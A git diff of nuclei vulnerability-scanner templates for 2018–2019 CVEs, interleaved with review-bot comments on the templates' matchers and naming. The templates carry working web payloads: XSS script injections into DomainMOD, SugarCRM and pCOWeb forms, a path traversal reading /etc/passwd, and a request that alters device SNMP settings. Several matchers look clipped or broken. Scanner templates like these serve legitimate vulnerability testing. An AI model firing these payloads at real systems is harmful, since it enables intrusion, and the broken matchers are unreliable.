+ - https://nvd.nist.gov/vuln/detail/CVE-2018-19892
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-19892
+ cwe-id: CWE-79
+ metadata:
+ verified: "true"
+ tags: cve2018,domainmod,xss,authenticated,edb,cve
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+
+ - |
+ POST /admin/dw/add-server.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=
+
+ - |
+ GET /admin/dw/servers.php HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ host-redirects: true
+ max-redirects: 3
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '">'
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/nuclei-templates/CVE-2018/cve-2018-19914.yaml b/nuclei-templates/CVE-2018/cve-2018-19914.yaml
deleted file mode 100644
index f4203954c8..0000000000
--- a/nuclei-templates/CVE-2018/cve-2018-19914.yaml
+++ /dev/null
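Review bot: The description cites `/domain//admin/dw/add-server.php` (with a `/domain` prefix and a doubled slash) while the request posts to `/admin/dw/add-server.php`; the description should name the path the template actually exercises. The body matcher `'">'` is a two-character string present in almost any HTML page, so with `text/html` and status 200 it fires regardless of whether the `new_name` payload is echoed back; it should match the submitted script string, e.g. `- '<script>alert(document.domain)</script>'` (if the value was clipped during extraction, restore it, because as posted the check is meaningless). `max-redirects: 3` differs from the `2` used by the equivalent DomainMOD templates in this commit without an evident reason.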
@@ -1,54 +0,0 @@ -id: CVE-2018-19914 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. - reference: - - https://www.exploit-db.com/exploits/46375/ - - https://github.com/domainmod/domainmod/issues/87 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19914 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19914 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve2018,domainmod,xss,authenticated,edb,cve - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/dns.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - - - | - GET /assets/dns.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2018/cve-2018-19915.yaml b/nuclei-templates/CVE-2018/cve-2018-19915.yaml deleted file mode 100644 index 5a975e956b..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-19915.yaml +++ /dev/null 
@@ -1,54 +0,0 @@ -id: CVE-2018-19915 - -info: - name: DomainMOD <=4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. - reference: - - https://github.com/domainmod/domainmod/issues/87 - - https://www.exploit-db.com/exploits/46376/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19915 - cwe-id: CWE-79 - metadata: - verified: true - tags: domainmod,xss,authenticated,edb,cve,cve2018 - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - - | - POST /assets/add/host.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test - - - | - GET /assets/hosting.php HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - host-redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(all_headers_3, "text/html")' - - 'contains(body_3, ">")' - condition: and - -# Enhanced by mp on 2022/08/10 diff --git a/nuclei-templates/CVE-2018/cve-2018-20009.yaml b/nuclei-templates/CVE-2018/cve-2018-20009.yaml new file mode 100644 index 0000000000..40298f6945 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-20009.yaml 
@@ -0,0 +1,54 @@
+id: CVE-2018-20009
+
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.
+ reference:
+ - https://github.com/domainmod/domainmod/issues/88
+ - https://www.exploit-db.com/exploits/46372/
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20009
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-20009
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: domainmod,xss,authenticated,edb,cve,cve2018
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+
+ - |
+ POST /assets/add/ssl-provider.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=
+
+ - |
+ GET /assets/ssl-providers.php HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ host-redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
+
+# Enhanced by mp on 2022/08/10
diff --git a/nuclei-templates/CVE-2018/cve-2018-20010.yaml b/nuclei-templates/CVE-2018/cve-2018-20010.yaml
new file mode 100644
index 0000000000..9f5e6c82a0
--- /dev/null
+++ b/nuclei-templates/CVE-2018/cve-2018-20010.yaml
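Review bot: The description says both the `ssl-provider-name and ssl-provider's-url parameters` are vulnerable, but the request sends `new_url=` empty, so only the provider name is exercised; either inject into both fields (`new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`) or narrow the description to the field actually tested. The DSL condition `contains(body_3, ">")` accepts any HTML page, so the matcher cannot tell a reflected payload from the plain provider listing; it should contain the full injected string. This hunk introduces a lowercase `cve-2018-20009.yaml` while the same commit renames `cve-2018-20985.yaml` to `CVE-2018-20985.yaml`, leaving the directory with both naming conventions.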
@@ -0,0 +1,54 @@
+id: CVE-2018-20010
+
+info:
+ name: DomainMOD 4.11.01 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field.
+ reference:
+ - https://www.exploit-db.com/exploits/46373/
+ - https://github.com/domainmod/domainmod/issues/88
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-20010
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
+ cve-id: CVE-2018-20010
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ tags: domainmod,xss,authenticated,edb,cve,cve2018
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_username={{username}}&new_password={{password}}
+
+ - |
+ POST /assets/add/ssl-provider-account.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=
+
+ - |
+ GET /assets/ssl-accounts.php HTTP/1.1
+ Host: {{Hostname}}
+
+ cookie-reuse: true
+ host-redirects: true
+ max-redirects: 2
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_3 == 200'
+ - 'contains(all_headers_3, "text/html")'
+ - 'contains(body_3, ">")'
+ condition: and
+
+# Enhanced by mp on 2022/08/10
diff --git a/nuclei-templates/CVE-2018/CVE-2018-20470.yaml b/nuclei-templates/CVE-2018/cve-2018-20470.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-20470.yaml
rename to nuclei-templates/CVE-2018/cve-2018-20470.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-2392.yaml b/nuclei-templates/CVE-2018/cve-2018-2392.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-2392.yaml
rename to nuclei-templates/CVE-2018/cve-2018-2392.yaml
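Review bot: The second request hard-codes `new_ssl_provider_id=1&new_owner_id=1`, so on an instance whose first provider or owner has a different id the insert may be rejected and the template silently reports nothing; a note such as `# assumes a provider and an owner with id 1 exist -- confirm on the target` would at least make the precondition visible. None of the three DSL conditions verifies that request 1 actually authenticated: a failed login that lands on a 200 `text/html` page containing `>` satisfies `status_code_3 == 200`, `contains(all_headers_3, "text/html")` and `contains(body_3, ">")` alike, so the last condition needs the full injected payload rather than `">"` to mean anything. `verified: true` is a bare boolean here but a quoted `"true"` in other DomainMOD files added by this commit.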
diff --git a/nuclei-templates/CVE-2018/CVE-2018-3238.yaml b/nuclei-templates/CVE-2018/cve-2018-3238.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-3238.yaml rename to nuclei-templates/CVE-2018/cve-2018-3238.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-5715.yaml b/nuclei-templates/CVE-2018/cve-2018-5715.yaml new file mode 100644 index 0000000000..5097ee9d4b --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-5715.yaml @@ -0,0 +1,44 @@ +id: CVE-2018-5715 + +info: + name: SugarCRM 3.5.1 - Cross-Site Scripting + author: edoardottt + severity: medium + description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + reference: + - https://www.exploit-db.com/exploits/43683 + - https://m4k4br0.github.io/sugarcrm-xss/ + - https://www.exploit-db.com/exploits/43683/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-5715 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-5715 + cwe-id: CWE-79 + metadata: + google-query: intext:"SugarCRM Inc. All Rights Reserved" + shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" + tags: sugarcrm,xss,edb,cve,cve2018 + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '&"/>=&"><< Back

' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/11 diff --git a/nuclei-templates/CVE-2018/CVE-2018-7251.yaml b/nuclei-templates/CVE-2018/cve-2018-7251.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7251.yaml rename to nuclei-templates/CVE-2018/cve-2018-7251.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7600.yaml b/nuclei-templates/CVE-2018/cve-2018-7600.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7600.yaml rename to nuclei-templates/CVE-2018/cve-2018-7600.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-7602.yaml b/nuclei-templates/CVE-2018/cve-2018-7602.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7602.yaml rename to nuclei-templates/CVE-2018/cve-2018-7602.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7662.yaml b/nuclei-templates/CVE-2018/cve-2018-7662.yaml new file mode 100644 index 0000000000..c2cfc5117d --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7662.yaml 
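Review bot: The `reference` list carries `https://www.exploit-db.com/exploits/43683` twice (once with a trailing slash), a duplicate inherited from the removed uppercase file; drop one. The single body word `'&"/>=&"><< Back` is broken across lines in this hunk and contains none of the `<script>alert(1)</script>` that the path injects, so as posted the matcher would either fail to parse or match page furniture rather than the reflection; the word should be the exact reflected fragment on one line, e.g. `- '"/><script>alert(1)</script>'` (the text may have been mangled on extraction, so check the committed file). Renaming `google-dork` to `google-query` in `metadata` is fine but is a semantic change the commit message does not mention.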
@@ -0,0 +1,41 @@
+id: CVE-2018-7662
+
+info:
+ name: CouchCMS <= 2.0 - Path Disclosure
+ author: ritikchaddha
+ severity: medium
+ description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php.
+ reference:
+ - https://github.com/CouchCMS/CouchCMS/issues/46
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-7662
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2018-7662
+ cwe-id: CWE-200
+ tags: couchcms,fpd,cve,cve2018
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php"
+ - "{{BaseURL}}/addons/phpmailer/phpmailer.php"
+
+ stop-at-first-match: true
+ matchers-condition: or
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "mysql2i.func.php on line 10"
+ - "Fatal error: Cannot redeclare mysql_affected_rows() in"
+ condition: and
+
+ - type: word
+ part: body
+ words:
+ - "phpmailer.php on line 10"
+ - "Fatal error: Call to a menber function add_event_listener() on a non-object in"
+ condition: and
+
+# Enhanced by mp on 2022/04/21
diff --git a/nuclei-templates/CVE-2018/CVE-2018-7700.yaml b/nuclei-templates/CVE-2018/cve-2018-7700.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-7700.yaml
rename to nuclei-templates/CVE-2018/cve-2018-7700.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-8006.yaml b/nuclei-templates/CVE-2018/cve-2018-8006.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-8006.yaml
rename to nuclei-templates/CVE-2018/cve-2018-8006.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-8715.yaml b/nuclei-templates/CVE-2018/cve-2018-8715.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-8715.yaml
rename to nuclei-templates/CVE-2018/cve-2018-8715.yaml
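Review bot: The second matcher's word `"Fatal error: Call to a menber function add_event_listener() on a non-object in"` misspells `member`, so it cannot match PHP's real fatal-error text, and because that matcher uses `condition: and` the phpmailer.php probe can never report; change it to `"Fatal error: Call to a member function add_event_listener() on a non-object in"`. Both matchers only fire when the target echoes PHP fatal errors into the response body, which the description could state so a miss is not read as "path not present".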
diff --git a/nuclei-templates/CVE-2018/CVE-2018-8727.yaml b/nuclei-templates/CVE-2018/cve-2018-8727.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-8727.yaml
rename to nuclei-templates/CVE-2018/cve-2018-8727.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-9161.yaml b/nuclei-templates/CVE-2018/cve-2018-9161.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-9161.yaml
rename to nuclei-templates/CVE-2018/cve-2018-9161.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-9205.yaml b/nuclei-templates/CVE-2018/cve-2018-9205.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-9205.yaml
rename to nuclei-templates/CVE-2018/cve-2018-9205.yaml
diff --git a/nuclei-templates/CVE-2018/CVE-2018-9995.yaml b/nuclei-templates/CVE-2018/cve-2018-9995.yaml
similarity index 100%
rename from nuclei-templates/CVE-2018/CVE-2018-9995.yaml
rename to nuclei-templates/CVE-2018/cve-2018-9995.yaml
diff --git "a/nuclei-templates/CVE-2018/cve-2018\342\200\22314064(1).yaml" "b/nuclei-templates/CVE-2018/cve-2018\342\200\22314064.yaml"
similarity index 100%
rename from "nuclei-templates/CVE-2018/cve-2018\342\200\22314064(1).yaml"
rename to "nuclei-templates/CVE-2018/cve-2018\342\200\22314064.yaml"
diff --git a/nuclei-templates/CVE-2019/cve-2019-0221.yaml b/nuclei-templates/CVE-2019/CVE-2019-0221.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-0221.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-0221.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-0230.yaml b/nuclei-templates/CVE-2019/CVE-2019-0230.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-0230.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-0230.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-1010290.yaml b/nuclei-templates/CVE-2019/CVE-2019-1010290.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-1010290.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-1010290.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-11370.yaml b/nuclei-templates/CVE-2019/CVE-2019-11370.yaml
new file mode 100644
index 0000000000..58ffa77862
--- /dev/null
+++ b/nuclei-templates/CVE-2019/CVE-2019-11370.yaml
@@ -0,0 +1,39 @@
+id: CVE-2019-11370
+info:
+ name: Carel pCOWeb < B1.2.4 - Cross-Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ Stored XSS was discovered in Carel pCOWeb prior to B1.2.4, as demonstrated by the config/pw_snmp.html "System contact" field.
+ reference:
+ - https://www.exploit-db.com/exploits/46897
+ - https://github.com/nepenthe0320/cve_poc/blob/master/CVE-2019-11370
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-11370
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2019-11370
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: http.html:"pCOWeb"
+ verified: "true"
+ tags: cve,cve2019,pcoweb,xss,carel
+requests:
+ - raw:
+ - |
+ POST /config/pw_snmp_done.html HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ %3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+ - |
+ GET /config/pw_snmp.html HTTP/1.1
+ Host: {{Hostname}}
+ req-condition: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(body_2, "text/html")'
+ - status_code_2 == 200
+ - contains(body_2, 'value=\"\">\">')
+ condition: and
diff --git a/nuclei-templates/CVE-2019/cve-2019-11869.yaml b/nuclei-templates/CVE-2019/CVE-2019-11869.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-11869.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-11869.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml b/nuclei-templates/CVE-2019/CVE-2019-12581.yaml
deleted file mode 100644
index e55f98cb7e..0000000000
--- a/nuclei-templates/CVE-2019/CVE-2019-12581.yaml
+++ /dev/null
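Review bot: The first dsl clause `'contains(body_2, "text/html")'` tests the response body for a content type; it is almost certainly meant to look at the headers, and the DomainMOD template removed further down this diff spells the same check as `contains(all_headers_2, "text/html")`. The first request writes the payload into the device's SNMP syscontact setting and nothing in the template restores it, so it should carry the `intrusive` tag and the description should say that it modifies device configuration. This file also re-adds, in upper case, the `cve-2019-11370.yaml` that the diff deletes further down, while other hunks rename `CVE-2019-*.yaml` files to lower case and the `cve-2018\342\200\22314064.yaml` rename keeps an en dash in the file name; settling on one `CVE-YYYY-NNNN.yaml` form before merge would avoid a directory that mixes both conventions.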
@@ -1,38 +0,0 @@ -id: CVE-2019-12581 -info: - name: Zyxel ZyWall / USG / UAG - Reflected Cross-site scripting - author: n-thumann - severity: medium - description: A reflective Cross-site scripting (XSS) vulnerability in the free_time_failed.cgi CGI program in selected Zyxel ZyWall, USG, and UAG devices allows remote attackers to inject arbitrary web script or HTML via the err_msg parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-12581 - - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ - - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12581 - cwe-id: CWE-79 - metadata: - shodan-query: http.title:"ZyWall" - tags: cve,cve2019,zyxel,zywall,xss -requests: - - method: GET - path: - - "{{BaseURL}}/free_time_failed.cgi?err_msg=" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Please contact with administrator." - condition: and - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-12725.yaml b/nuclei-templates/CVE-2019/CVE-2019-12725.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-12725.yaml rename to nuclei-templates/CVE-2019/CVE-2019-12725.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml b/nuclei-templates/CVE-2019/CVE-2019-12962.yaml deleted file mode 100644 index 0be257a894..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-12962.yaml +++ /dev/null 
@@ -1,40 +0,0 @@ -id: CVE-2019-12962 -info: - name: LiveZilla Server 8.0.1.0 - Cross Site Scripting - author: Clment Cruchet - severity: medium - description: | - LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS - reference: - - https://www.exploit-db.com/exploits/49669 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-12962 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:LiveZilla - verified: true - tags: cve,cve2019,livezilla,xss -requests: - - method: GET - path: - - '{{BaseURL}}/mobile/index.php' - headers: - Accept-Language: ';alert(document.domain)//' - matchers-condition: and - matchers: - - type: word - part: body - words: - - "var detectedLanguage = ';alert(document.domain)//';" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-13396.yaml b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml new file mode 100644 index 0000000000..6d6f9a7db9 --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-13396.yaml 
@@ -0,0 +1,37 @@
+id: CVE-2019-13396
+info:
+ name: FlightPath Local File Inclusion
+ author: 0x_Akoko
+ severity: high
+ description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability.
+ reference:
+ - https://www.cvedetails.com/cve/CVE-2019-13396/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-13396
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2019-13396
+ cwe-id: CWE-22
+ tags: cve,cve2021,metabase,lfi
+
+requests:
+ - raw:
+ - |
+ POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1
+ Host: {{Hostname}}
+ Accept: application/json, text/plain, */*
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ condition: or
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2019/cve-2019-13462.yaml b/nuclei-templates/CVE-2019/CVE-2019-13462.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-13462.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-13462.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-14205.yaml b/nuclei-templates/CVE-2019/CVE-2019-14205.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-14205.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-14205.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-14312.yaml b/nuclei-templates/CVE-2019/CVE-2019-14312.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-14312.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-14312.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-14974.yaml b/nuclei-templates/CVE-2019/CVE-2019-14974.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-14974.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-14974.yaml
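Review bot: `form_token` is hard-coded to `fb7c9d22c839e3fb5fa93fe383b30c9b`, a value that is only valid for whatever instance it was captured from, so on every other deployment the check silently misses; the `cve-2019-13396.yaml` removed at the end of this diff fetched the token with an extractor and sent `form_token={{token}}`, and this version should not replace it. The tags `cve,cve2021,metabase,lfi` do not describe a 2019 FlightPath CVE, whereas the deleted file carried `cve,cve2019,flightpath,lfi`. `severity: high` disagrees with the `cvss-score: 5.3` a few lines below, and `condition: or` on a single-regex matcher has no effect.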
diff --git a/nuclei-templates/CVE-2019/cve-2019-15107.yaml b/nuclei-templates/CVE-2019/CVE-2019-15107.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15107.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15107.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15713.yaml b/nuclei-templates/CVE-2019/CVE-2019-15713.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-15713.yaml rename to nuclei-templates/CVE-2019/CVE-2019-15713.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml b/nuclei-templates/CVE-2019/CVE-2019-15811.yaml deleted file mode 100644 index a8adc52d15..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-15811.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2019-15811 -info: - name: DomainMOD 4.13.0 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters. - reference: - - https://www.exploit-db.com/exploits/47325 - - https://github.com/domainmod/domainmod/issues/108 - - https://zerodays.lol/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-15811 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2019,domainmod,xss,authenticated -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - redirects: true - max-redirects: 2 - req-condition: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' - - 'contains(body_2, "DomainMOD")' - condition: and 
diff --git a/nuclei-templates/CVE-2019/cve-2019-15858.yaml b/nuclei-templates/CVE-2019/CVE-2019-15858.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-15858.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-15858.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-15889.yaml b/nuclei-templates/CVE-2019/CVE-2019-15889.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-15889.yaml
